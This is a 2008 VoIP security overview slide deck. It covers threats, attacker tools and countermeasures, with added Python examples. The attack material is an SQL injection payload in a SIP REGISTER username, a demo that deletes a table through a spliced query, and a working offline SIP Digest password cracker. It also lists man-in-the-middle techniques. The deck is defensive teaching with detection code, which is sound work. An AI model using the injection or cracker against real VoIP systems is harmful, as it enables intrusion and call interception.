VoIP Security: An Overview
(2008)
Meletis Belsis
Information Security Consultant
MPhil / MSc / BSc
CWNA/CWSP, C|EH, CCSA, ISO27001LA
Agenda
VoIP Technology
VoIP Complexity
VoIP Threats
Example Attacks
The Hacker’s Toolbox
VoIP Countermeasures
The Company
VoIP Technology
• VoIP is an integral part of modern enterprises
• VoIP reduces OpEx by providing PSTN-like services over the
  existing data network
• Based on open IETF and ITU standards
• Protocols used to support VoIP include
  TCP/UDP/IP, DNS, TFTP, DHCP, STUN, HTTP, SIP, RTP
• VoIP components include:
  Routers, Switches, Firewalls, SIP Servers,
  Media Gateways, IP PBX, WiFi
VoIP Security
“ The flexibility of VoIP comes at a price: added
complexity in securing voice and data. Because
VoIP systems are connected to the data network
and share many of the same hardware and
software components, there are more ways for
intruders to attack a VoIP system than a
conventional voice telephone system or PBX “
NIST SP 800-58: Security Considerations for Voice over IP Systems
VoIP Security Complexity
• Securing a VoIP network is complex because:
  – VoIP inherits the TCP/IP vulnerabilities.
  – VoIP uses the corporate network to operate. Usually
    there is no separation between the voice and data networks.
  – Applying security controls may affect other attributes of VoIP
    (e.g. delay/latency, jitter): encryption and deep inspection add
    processing time to every packet of a real-time stream.
  – VoIP media (RTP) runs over UDP on ports negotiated dynamically
    per call, so ordinary stateful firewalls and NAT devices cannot
    open the right pinholes without understanding the signaling.
    NAT traversal techniques such as STUN (or a SIP-aware
    firewall/ALG) need to be applied.
VoIP Threats
• Denial of Service
  – Flood attacks (e.g. controller flooding)
  – BYE teardown
  – Registration reject
  – Hold attack
  – Call reject
• Interception attacks
  – Call hijacking
  – Registration hijacking
  – Media session hijacking
  – Server masquerading
  – DNS poisoning
  – Caller ID spoofing
  – VoIP VLAN hopping
  – ARP spoofing
• Covert channels
• WiFi attacks
[Diagram: two SIP servers and a media proxy, with the SIP signaling and media stream paths and the attack points marked on them: sniffing, (D)DoS attack, wiretapping, SPIT]
VoIP Threats
• VoIP platform vulnerabilities
  – CAN-2004-0056: Malformed H.323 packet to exploit
    Nortel BCM vulnerabilities
  – CAN-2004-0054: Exploits Cisco IOS H.323
    implementation
  – CVE-2007-4459: Cisco SIP DoS vulnerabilities
  – CVE-2007-6424: Vulnerabilities in the Fonality
    Trixbox 2.0 PBX products
  – CVE-2007-5361: Vulnerabilities in the Alcatel-Lucent
    OmniPCX Enterprise Communication Server
  – CVE-2007-5556: Vulnerabilities in the Avaya VoIP
    handset
Server Masquerading
VLAN Hopping
Source: http://www.securityfocus.com/infocus/1892
SIP Injection
The UE's initial REGISTER request looks like:

  REGISTER sip:home1.de SIP/2.0
  Authorization: Digest username="user_private@home1.de",
    realm="home1.de", nonce="", uri="sip:home1.de", response=""

A malicious REGISTER carrying an SQL injection payload in the
username parameter looks like:

  REGISTER sip:home1.de SIP/2.0
  Authorization: Digest username="user_private@home1.de;delete table users",
    realm="home1.de", nonce="", uri="sip:home1.de", response=""

If the registrar splices the username into its subscriber-database
query instead of binding it as a parameter, the text after the ';'
is executed as a second SQL statement.
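The following is an added example, not code from the slides or from any product they mention. It models a registrar that looks up a subscriber's digest hash with the SIP username spliced into SQL, next to the parameterised and allowlisted version. The database, table layout, the `INJECTED_USERNAME` payload and the statement-splitting loop (standing in for a driver that accepts stacked statements) are all constructed for the demo; the payload uses `DELETE FROM` so that the effect the slide describes is actually observable, since `delete table users` is not valid SQL.

```python
import re
import sqlite3

# Constructed registrar database for the demo (not from the original slides):
# one row per subscriber holding the digest HA1 the registrar verifies against.
def make_registrar_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (username TEXT PRIMARY KEY, ha1 TEXT NOT NULL);"
        "INSERT INTO users VALUES ('user_private@home1.de', 'a1b2c3');"
        "INSERT INTO users VALUES ('alice@home1.de', 'd4e5f6');"
    )
    return conn


def count_users(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


def lookup_ha1_vulnerable(conn: sqlite3.Connection, username: str):
    """Registrar lookup that splices the SIP username straight into SQL.

    The username is whatever the registrar pulled out of
    Authorization: Digest username="...", so the attacker controls it.
    Python's sqlite3 refuses stacked statements in execute(), so this loop
    emulates a driver that runs them (assumption about the target driver).
    """
    sql = "SELECT ha1 FROM users WHERE username = '" + username + "'"
    cur = conn.cursor()
    first_rows = None
    for stmt in (s.strip() for s in sql.split(";")):
        if not stmt:
            continue
        cur.execute(stmt)
        if first_rows is None:
            first_rows = cur.fetchall()
    conn.commit()
    return first_rows[0][0] if first_rows else None


# Allowlist for the subscriber address (assumption: this deployment only issues
# addresses of this shape; RFC 3261 permits more characters than this).
SIP_USERNAME_RE = re.compile(r"^[A-Za-z0-9._+\-]+@[A-Za-z0-9.\-]+$")


def lookup_ha1_safe(conn: sqlite3.Connection, username: str):
    """Same lookup with input validation and a parameterised query."""
    if not SIP_USERNAME_RE.fullmatch(username):
        return None
    row = conn.execute(
        "SELECT ha1 FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None


# Payload in the spirit of the slide's username="...;delete table users":
# closes the SQL string literal, then stacks a statement that is valid SQL.
INJECTED_USERNAME = "user_private@home1.de'; DELETE FROM users WHERE '1'='1"


def demo() -> dict:
    """Run the payload through both lookups on fresh databases."""
    vuln = make_registrar_db()
    vuln_result = lookup_ha1_vulnerable(vuln, INJECTED_USERNAME)
    safe = make_registrar_db()
    safe_result = lookup_ha1_safe(safe, INJECTED_USERNAME)
    return {
        "vulnerable_returned": vuln_result,          # attacker still gets a row back
        "vulnerable_users_left": count_users(vuln),  # ...and the table is emptied
        "safe_returned": safe_result,
        "safe_users_left": count_users(safe),
    }


if __name__ == "__main__":
    print(demo())
```

Binding the value with `?` is what removes the vulnerability; the allowlist is defence in depth and also rejects the `"` and `;` characters a REGISTER would need to smuggle anything else into the header.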
Hacker's Toolbox
• Oreka: a cross-platform system for recording and retrieving audio
  streams
• rtpBreak: detects, reconstructs and analyzes any RTP session through
  heuristics over the UDP network traffic
• SIPCrack: a SIP protocol login cracker (offline dictionary attack on
  sniffed Digest authentication)
• SiVuS: a SIP vulnerability scanner
• BYE Teardown: disconnects an active VoIP conversation by spoofing the
  SIP BYE message from the receiving party
• SipRogue: multifunctional SIP proxy that can be inserted between two
  talking parties
• RTPInject: attack tool that injects arbitrary audio into established RTP
  connections
• TFTP Cracker: a tool to attack VoIP endpoints and copy their
  configuration through TFTP
• ILTY (I'm Listening To You): a multi-channel VoIP sniffer
• Registration Adder: a tool that allows fake registrations to be sent
• VoIP Hopper: allows hopping from a normal data VLAN into the voice VLAN
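To make concrete what SIPCrack does with a sniffed REGISTER, here is an added example (not code from the slides or from SIPCrack itself) that computes the SIP Digest response exactly as RFC 3261 reuses RFC 2617 MD5 Digest, and runs an offline dictionary attack against a captured `Authorization` header. The header itself is constructed inside the block from the assumed password `secret` and an arbitrary nonce; in a real capture it is copied verbatim from the sniffed REGISTER.

```python
import hashlib
import re


def md5_hex(data: str) -> str:
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def parse_digest_header(header: str) -> dict:
    """Parse 'Digest k="v", k2=v2, ...' (RFC 2617 syntax) into a dict."""
    scheme, _, params = header.strip().partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest Authorization header")
    pairs = re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', params)
    return {key: quoted or bare for key, quoted, bare in pairs}


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None) -> str:
    """HTTP Digest (MD5) response as used by SIP (RFC 3261 section 22)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    if qop:  # qop=auth form, with nonce-count and client nonce
        return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def crack_sip_digest(auth_header: str, method: str, wordlist):
    """Offline dictionary attack on a sniffed Authorization header.

    Everything except the password is in the captured header, so each
    candidate costs three MD5 operations and no traffic to the registrar.
    Returns the password on a match, otherwise None.
    """
    p = parse_digest_header(auth_header)
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate, method,
                                p["uri"], p["nonce"], p.get("qop"),
                                p.get("nc"), p.get("cnonce"))
        if guess == p["response"]:
            return candidate
    return None


# --- constructed sample capture (not from the slides) -----------------------
# A REGISTER from user_private@home1.de answering a challenge with a weak
# password; the nonce is arbitrary. In a real capture this line comes straight
# out of the sniffed REGISTER.
SAMPLE_PASSWORD = "secret"   # only used to build the sample; unknown to the attacker


def build_sample_header() -> str:
    nonce = "3b2f4c9e7d1a"
    response = digest_response("user_private@home1.de", "home1.de",
                               SAMPLE_PASSWORD, "REGISTER", "sip:home1.de", nonce)
    return ('Digest username="user_private@home1.de", realm="home1.de", '
            f'nonce="{nonce}", uri="sip:home1.de", response="{response}", '
            'algorithm=MD5')


WORDLIST = ["123456", "password", "1234", "secret", "letmein"]

if __name__ == "__main__":
    print(crack_sip_digest(build_sample_header(), "REGISTER", WORDLIST))
```

The nonce only prevents replaying the response; it does nothing against guessing, so a handset password drawn from a small keyspace falls to this in seconds once one REGISTER has been captured. That is the reason SIP over TLS matters as a countermeasure: it keeps the `Authorization` header off the wire in the first place.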
Hacker's Toolbox
[Screenshots: RTPInject and the SiVuS scanner]
WiFi VoIP
• NetStumbler is used by wardrivers to detect unprotected
  WiFi networks
• AirSnort is widely used to recover WEP keys
VoIP Countermeasures
• Network separation: although dedicated VoIP VLANs offer a
  level of security (and are exactly what VLAN hopping
  targets), a physically dedicated VoIP network is more secure.
• SIP encryption: TLS can be used to encrypt the SIP messages
  exchanged between nodes, hop by hop. In typical deployments
  TLS authenticates only the server (the phone verifies the
  proxy's certificate); mutual TLS with client certificates is
  possible but rarely used on handsets. S/MIME is the other
  option defined in RFC 3261 and protects message bodies
  end-to-end.
• RTP encryption: Secure RTP (SRTP, RFC 3711) can be used to
  encrypt and authenticate the media in a VoIP network. Its keys
  are carried in the signaling (e.g. SDES in the SDP body), so
  SRTP only helps if the signaling itself is protected with TLS.
VoIP Countermeasures
• Management: avoid weak management protocols such as Telnet,
  TFTP and SNMP v1/v2c, which carry credentials and configuration
  in clear text; prefer SSH, SCP/HTTPS and SNMPv3.
• Firewalls: ensure that VoIP components (e.g. SIP proxy, DNS,
  DHCP, RADIUS) are logically located behind VoIP-aware firewalls
  (e.g. SIP inspection on Cisco ASA), which open only the RTP
  ports negotiated in the SDP body instead of leaving UDP ranges
  permanently open.
• IDS/IPS: the existing IDS/IPS architecture can be extended
  with SIP-aware sensors.
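What a SIP-aware sensor can do that a generic IDS cannot is keep dialog state. The following added example (not code from the slides or from any IDS product) runs two of the threats listed earlier over sniffed signaling: a forged BYE teardown, detected when a BYE arrives for a dialog the sensor never saw set up or from a host that was neither party to the INVITE/200 OK exchange, and a REGISTER flood, detected with a per-source sliding window. The SIP messages, IP addresses, Call-IDs and the 20-per-10-seconds threshold are constructed for the demo.

```python
from collections import defaultdict, deque

REGISTER_FLOOD_THRESHOLD = 20   # REGISTERs per source per window (tuning assumption)
REGISTER_FLOOD_WINDOW = 10.0    # seconds


def parse_sip(raw: str) -> dict:
    """Minimal SIP parser: start line plus the headers the sensor needs."""
    lines = raw.strip().splitlines()
    start = lines[0].strip()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break                       # end of headers, body follows
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cseq = headers.get("cseq", "").split()
    method = cseq[-1].upper() if cseq else None
    if start.startswith("SIP/2.0"):    # response: method comes from CSeq
        return {"kind": "response", "method": method,
                "status": int(start.split()[1]), "call_id": headers.get("call-id")}
    return {"kind": "request", "method": start.split()[0].upper(),
            "status": None, "call_id": headers.get("call-id")}


class SipSensor:
    """Stateful checks a SIP-aware IDS sensor can run on sniffed signaling."""

    def __init__(self):
        self.dialogs = {}                      # Call-ID -> IPs seen in INVITE / 200 OK
        self.register_times = defaultdict(deque)
        self.alerts = []

    def observe(self, ts: float, src_ip: str, raw: str) -> None:
        msg = parse_sip(raw)
        cid, kind, method = msg["call_id"], msg["kind"], msg["method"]
        if method == "INVITE" and (kind == "request" or msg["status"] == 200):
            self.dialogs.setdefault(cid, set()).add(src_ip)   # learn both parties
        elif kind == "request" and method == "BYE":
            parties = self.dialogs.get(cid)
            if parties is None:
                self.alerts.append(("BYE_UNKNOWN_DIALOG", src_ip, cid))
            elif src_ip not in parties:
                self.alerts.append(("BYE_FROM_NON_PARTICIPANT", src_ip, cid))
        elif kind == "request" and method == "REGISTER":
            window = self.register_times[src_ip]
            window.append(ts)
            while window and ts - window[0] > REGISTER_FLOOD_WINDOW:
                window.popleft()
            if len(window) == REGISTER_FLOOD_THRESHOLD + 1:   # fire once on crossing
                self.alerts.append(("REGISTER_FLOOD", src_ip, None))


# --- constructed sample traffic (not from the slides) -----------------------
INVITE = """INVITE sip:bob@home1.de SIP/2.0
Via: SIP/2.0/UDP 10.0.0.10:5060;branch=z9hG4bK776
From: <sip:alice@home1.de>;tag=a1
To: <sip:bob@home1.de>
Call-ID: call-1@10.0.0.10
CSeq: 1 INVITE
"""
OK_200 = """SIP/2.0 200 OK
Via: SIP/2.0/UDP 10.0.0.10:5060;branch=z9hG4bK776
From: <sip:alice@home1.de>;tag=a1
To: <sip:bob@home1.de>;tag=b2
Call-ID: call-1@10.0.0.10
CSeq: 1 INVITE
"""


def bye(call_id: str, frm: str, to: str) -> str:
    return (f"BYE sip:{to} SIP/2.0\nFrom: <sip:{frm}>;tag=b2\nTo: <sip:{to}>;tag=a1\n"
            f"Call-ID: {call_id}\nCSeq: 2 BYE\n")


def register(n: int) -> str:
    return (f"REGISTER sip:home1.de SIP/2.0\nFrom: <sip:ext{n}@home1.de>;tag=r{n}\n"
            f"To: <sip:ext{n}@home1.de>\nCall-ID: reg-{n}@10.0.0.77\nCSeq: 1 REGISTER\n")


def run_demo() -> list:
    sensor = SipSensor()
    sensor.observe(0.0, "10.0.0.10", INVITE)                  # Alice calls Bob
    sensor.observe(0.5, "10.0.0.20", OK_200)                  # Bob answers
    # Forged BYE "from Bob", but emitted by a third host (BYE teardown tool)
    sensor.observe(3.0, "10.0.0.99", bye("call-1@10.0.0.10", "bob@home1.de", "alice@home1.de"))
    # BYE for a Call-ID the sensor never saw set up
    sensor.observe(3.1, "10.0.0.99", bye("nosuchcall@10.0.0.99", "bob@home1.de", "alice@home1.de"))
    # Legitimate BYE from Bob: no alert
    sensor.observe(9.0, "10.0.0.20", bye("call-1@10.0.0.10", "bob@home1.de", "alice@home1.de"))
    # 25 REGISTERs from one host in 2.5 seconds: registration flood
    for n in range(25):
        sensor.observe(10.0 + n * 0.1, "10.0.0.77", register(n))
    return sensor.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

The source-IP check only catches a teardown tool that sends from its own address. An attacker who also spoofs the victim's IP defeats it, which is why this sensor belongs alongside the layer 2 controls on the hardening slide (port security, DHCP snooping, 802.1X) rather than in place of them.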
VoIP Countermeasures
• Hardening the network environment
  – Enforce security at the network equipment:
    • Port security
    • DHCP snooping (its binding table also feeds dynamic ARP inspection)
    • Receive access lists on the devices' control plane
    • Enable MAC filtering
    • Define the maximum number of MAC addresses per port
    • Enable 802.1X for VoIP devices
  – Use AAA on all VoIP infrastructure systems
  – Disable the PC port on VoIP phones with multiple ports
  – Harden the OS of the platforms used
    • Restrict DNS zone transfers
    • Static IP-to-MAC reservations on DHCP
    • Apply security patches / updates
    • Disable Telnet and/or the r-utilities
VoIP Countermeasures
• VoIP honeypots
  – VoIP phones
  – Fake SIP proxies (e.g. Asterisk)
Extra Material
Detecting WiFi Networks
[Screenshots: WiFi network discovery, two slides]
Bypassing MAC ACLs
[Screenshot]
• DNSDNS (modify entries to point all traffic to a hacker's
machine)
• DHCPDHCP (make all traffic go to hackers machine as
default gateway, or change DNS entry to point at
hacker's machine so all names resolve to hacker's
IP address)
• ARPARP (reply with hacker's MAC address, gratuitous
ARPs or regular ARP replies)
• Flood CAMFlood CAM tables in switches to destroy existing
MAC addr/port associations so all traffic is
broadcast out every port, and then use ARP attacks
• Routing protocolsRouting protocols (change routing such that traffic
physically passes through a router/machine
controlled by hacker)
• Spanning tree attacksSpanning tree attacks to change layer 2 forwarding
topology
• Physical insertionPhysical insertion (e.g. PC with dual NIC cards, be it
Ethernet based or WLAN-based)
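The ARP entry above is the one most often used against phones on a shared VLAN, and it is also the easiest to spot from the wire. As an added example (not code from the slides), the monitor below applies the two checks dynamic ARP inspection makes on a switch: a claimed IP-to-MAC binding that contradicts a trusted binding (gateway, SIP proxy) or the first binding learned for that IP, and a reply that answers no recent request, which is what gratuitous ARP poisoning looks like. The trusted bindings, the hosts, the MAC addresses and the two-second window are constructed for the demo; in production the bindings would come from DHCP snooping or static configuration.

```python
# Constructed bindings for hosts whose ARP entries must never move: the default
# gateway and the SIP proxy (assumption; in production these come from DHCP
# snooping bindings or static configuration, as dynamic ARP inspection does).
TRUSTED_BINDINGS = {
    "10.0.0.1": "00:11:22:33:44:01",   # default gateway
    "10.0.0.5": "00:11:22:33:44:05",   # SIP proxy
}
UNSOLICITED_WINDOW = 2.0   # seconds a reply may trail the request it answers (assumption)


class ArpMonitor:
    """Flags ARP packets that contradict known bindings or answer no request."""

    def __init__(self, trusted: dict):
        self.trusted = {ip: mac.lower() for ip, mac in trusted.items()}
        self.learned = {}      # ip -> first MAC seen (assumption: first sighting is legitimate)
        self.pending = {}      # (requester_ip, requested_ip) -> time of last request
        self.alerts = []

    def _check_binding(self, ip: str, mac: str) -> None:
        mac = mac.lower()
        expected = self.trusted.get(ip)
        if expected is not None:
            if expected != mac:
                self.alerts.append(("BINDING_CONFLICT", ip, mac))
                return
        elif ip in self.learned and self.learned[ip] != mac:
            self.alerts.append(("MAC_CHANGE", ip, mac))
            return
        self.learned.setdefault(ip, mac)

    def observe(self, ts: float, op: str, sender_ip: str, sender_mac: str,
                target_ip: str, target_mac: str) -> None:
        # Every ARP packet asserts sender_ip <-> sender_mac; check it either way.
        self._check_binding(sender_ip, sender_mac)
        if op == "request":
            self.pending[(sender_ip, target_ip)] = ts
            return
        # A reply should answer a recent request from target_ip for sender_ip;
        # otherwise it is unsolicited (gratuitous, or injected to poison a cache).
        asked = self.pending.get((target_ip, sender_ip))
        if asked is None or ts - asked > UNSOLICITED_WINDOW:
            self.alerts.append(("UNSOLICITED_REPLY", sender_ip, sender_mac.lower()))


def run_demo() -> list:
    """Constructed ARP exchange: a normal lookup, then a two-sided poisoning."""
    mon = ArpMonitor(TRUSTED_BINDINGS)
    phone, gw, attacker = "00:aa:bb:cc:dd:10", "00:11:22:33:44:01", "de:ad:be:ef:00:01"
    # Phone 10.0.0.10 resolves the gateway and the gateway answers: normal.
    mon.observe(0.0, "request", "10.0.0.10", phone, "10.0.0.1", "00:00:00:00:00:00")
    mon.observe(0.1, "reply", "10.0.0.1", gw, "10.0.0.10", phone)
    # Attacker claims to be the gateway, unprompted: poisons the phone's cache.
    mon.observe(5.0, "reply", "10.0.0.1", attacker, "10.0.0.10", phone)
    # Attacker claims to be the phone towards the gateway: the other half of the MITM.
    mon.observe(5.1, "reply", "10.0.0.10", attacker, "10.0.0.1", gw)
    return mon.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

Gratuitous ARP is also sent legitimately when a host boots or fails over, so the unsolicited-reply signal on its own is noisy; the combination with a binding conflict on the gateway or proxy address is what should page someone.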
Questions?
